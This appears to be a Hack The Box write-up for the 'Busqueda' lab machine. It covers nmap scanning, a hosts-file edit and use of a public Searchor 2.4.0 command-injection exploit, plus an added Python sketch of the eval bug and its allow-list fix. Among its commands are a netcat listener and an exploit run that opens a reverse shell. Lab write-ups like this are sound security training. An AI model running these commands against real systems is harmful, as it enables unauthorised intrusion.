Writeup Busqueda - Hack The Box


In this writeup, we will explore the process of compromising the "Busqueda" Hack The Box machine. This Linux-based machine is assigned the IP address 10.10.11.208. Our objective is to gain access to the machine and retrieve the user flag.

Initial Reconnaissance


We begin by scanning the open services on the target machine using the nmap command:

sudo nmap -O 10.10.11.208

The nmap scan reveals two open ports:

  • Port 22: SSH
  • Port 80: HTTP

Web Application Analysis

When we access the web application at http://10.10.11.208, it redirects us to http://searcher.htb/. However, since the domain cannot be resolved, we need to add an entry to the /etc/hosts file:

echo "10.10.11.208 searcher.htb" | sudo tee -a /etc/hosts

After modifying the hosts file, we reload the web page to access the application.

At the footer of the page, we notice the following information:

"Powered by Flask and Searchor 2.4.0"

Exploiting Searchor 2.4.0

Upon discovering that the web application is powered by Searchor 2.4.0, we perform a quick Google search for potential exploits. A suitable exploit is found at the following GitHub repository:

GitHub - nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection: Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)

The exploit leverages netcat for communication. We initiate a netcat listener on our machine:

nc -lvnp 9001

Next, we run the exploit script from our machine against the target, replacing "IP" with our machine's IP address:

sh exploit.sh searcher.htb IP

This exploit establishes a connection to our netcat listener, providing us with access to the target machine.

User Flag

With a foothold on the target machine, we navigate to the /home/svc directory:

cd /home/svc

Inside this directory, we locate the user.txt file, which contains the user flag.

Conclusion

In this writeup, we successfully compromised the "Busqueda" Hack The Box machine by exploiting an Arbitrary Command Injection vulnerability in the Searchor 2.4.0 web application. This allowed us to gain access to the machine and retrieve the user flag from the /home/svc directory.
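The bug class named above, as an added example that is not code from Searchor, the linked exploit, or this writeup: a simplified model in which user input is interpolated into a string passed to eval, beside the allow-list form that treats the same input as data. ENGINES, marker, build_url and both search_* functions are hypothetical names, and the crafted input is constructed and only calls a harmless marker.

```python
from urllib.parse import quote_plus

# Hypothetical engine table (assumption, stands in for a search library's engines).
ENGINES = {
    "Google": "https://www.google.com/search?q={}",
    "DuckDuckGo": "https://duckduckgo.com/?q={}",
}
EVALUATED = []  # filled only when input text is executed as code


def marker(tag):
    """Harmless stand-in that records that input was evaluated as code."""
    EVALUATED.append(tag)
    return ""


def build_url(engine, query):
    return ENGINES[engine].format(quote_plus(query))


def search_vulnerable(engine, query):
    # Anti-pattern: user input is pasted into source text, then evaluated.
    return eval(f"build_url('{engine}', '{query}')")


def search_hardened(engine, query):
    # Fix: allow-list the engine name and pass the query purely as data.
    if engine not in ENGINES:
        raise ValueError(f"unknown engine: {engine!r}")
    return build_url(engine, query)


def demo():
    crafted = "x' + marker('ran') + '"  # constructed input, closes the quote
    EVALUATED.clear()
    search_vulnerable("Google", crafted)
    ran_in_vulnerable = list(EVALUATED)
    EVALUATED.clear()
    url = search_hardened("Google", crafted)
    return ran_in_vulnerable, list(EVALUATED), url


if __name__ == "__main__":
    print(demo())
```

In the hardened form the quote characters arrive URL-encoded in the query string and the marker never runs.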

It's crucial to stay updated with security practices and responsibly disclose vulnerabilities to ensure a safer digital environment.